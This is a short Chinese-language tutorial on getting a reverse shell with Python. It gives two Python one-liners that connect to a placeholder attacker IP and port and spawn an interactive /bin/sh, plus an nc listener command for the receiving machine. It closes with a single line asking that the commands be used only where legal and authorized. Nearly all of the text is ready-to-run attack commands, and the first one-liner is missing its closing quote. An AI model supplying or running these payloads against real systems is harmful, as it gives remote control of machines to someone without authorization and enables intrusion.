使用 Python 实现反弹 shell

使用 Python 实现反弹 shell

如果目标系统有 Python 环境，可以使用以下 Python 命令反弹 shell：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的IP地址",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

如果目标系统安装了 Python3，也可以使用以下方式：

`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的IP地址",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

监听端准备

在你的机器上，可以使用 nc 监听指定的端口，等待反弹的 shell 连接：

bash

复制代码

nc -lvnp 端口号

通过这种方式，你可以获得远程系统的 shell 控制。注意：请在合法且授权的场景中使用这些命令。